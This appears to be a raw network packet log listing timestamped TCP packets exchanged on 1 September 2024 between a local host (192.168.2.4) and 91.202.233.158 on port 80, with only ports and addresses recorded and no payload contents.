Sep 1, 2024 18:28:19.707855940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.707865953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.707875013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.707890987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.707899094 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.707911968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.707930088 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708100080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708111048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708120108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708129883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708137035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708146095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708151102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708156109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708167076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708172083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708178043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708189011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708192110 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708204985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708221912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708355904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708367109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708375931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708389997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708390951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708403111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708410978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708414078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708425999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708431005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708448887 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708463907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708620071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708630085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708641052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708652020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708662033 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708667994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708672047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708678961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708688974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708693027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708709955 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708719015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708872080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708882093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708892107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.708919048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.708928108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709005117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709016085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709024906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709038019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709048033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709057093 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709059000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709068060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709070921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709081888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709085941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709093094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709100008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709119081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709130049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709399939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709410906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709419966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709433079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709436893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709444046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709454060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709455013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709475040 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709476948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709487915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709491968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709501982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709511995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709527016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709530115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709538937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709548950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709551096 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709559917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709563971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709577084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709589005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709589958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.709597111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709613085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.709630966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751018047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751032114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751041889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751053095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751064062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751075029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751075029 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751104116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751127005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751149893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751159906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751169920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751182079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751193047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751229048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751276970 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751286983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751296043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751307964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751313925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751343966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751384974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751395941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751405954 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751430035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751447916 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751573086 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751584053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751594067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751605034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751615047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751617908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751629114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751641989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751646042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751652956 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751663923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751677036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751709938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751810074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751827955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751837969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751847029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.751849890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751872063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.751889944 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793179035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793189049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793204069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793229103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793248892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793276072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793287039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793296099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793307066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793319941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793345928 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793353081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793389082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793688059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793709040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793718100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793725014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793740034 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793757915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793790102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793801069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793811083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793822050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793860912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793894053 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.793898106 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.793972015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794003010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794014931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794035912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794053078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794068098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794075966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794075966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794075966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794078112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794083118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794089079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794143915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794154882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794209957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794226885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794235945 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794265985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794265985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794276953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794287920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794297934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794332981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794406891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794416904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794431925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794450045 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794467926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794522047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794531107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794539928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794549942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794565916 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794593096 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794601917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794611931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794646025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794725895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794735909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794747114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794756889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794764996 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794775009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794797897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794874907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794886112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794895887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794907093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794918060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794919968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794926882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.794933081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794958115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.794979095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795089960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795099974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795109034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795119047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795126915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795164108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795172930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795197010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795308113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795317888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795329094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795339108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795340061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795356035 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795361042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795365095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795366049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795403004 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795525074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795535088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795543909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795557976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795587063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795639038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795649052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795659065 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795669079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795675039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795679092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795690060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795690060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795701981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795728922 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795896053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795917034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795928001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795932055 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795937061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795948029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795958042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795958996 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795969963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795977116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.795981884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.795991898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796000004 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796016932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796035051 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796211958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796222925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796252012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796263933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796327114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796338081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796348095 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796358109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796365976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796369076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796380043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796391010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796392918 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796401024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796403885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796411037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796432018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796456099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796613932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796657085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796724081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796735048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796745062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796756029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796761036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796766996 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796777964 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796782017 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796796083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796803951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796814919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.796823025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796842098 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.796863079 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.837774992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.837853909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.837874889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.837879896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.837904930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.837910891 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.837915897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.837923050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.837943077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.837955952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838015079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838026047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838037014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838048935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838057995 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838058949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838090897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838145018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838185072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838191032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838196993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838218927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838227987 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838301897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838313103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838323116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838335037 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838349104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838371038 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:19.838433981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838443995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:19.838454008 CEST	80	56177	91.202.233.158	192.168.2.4
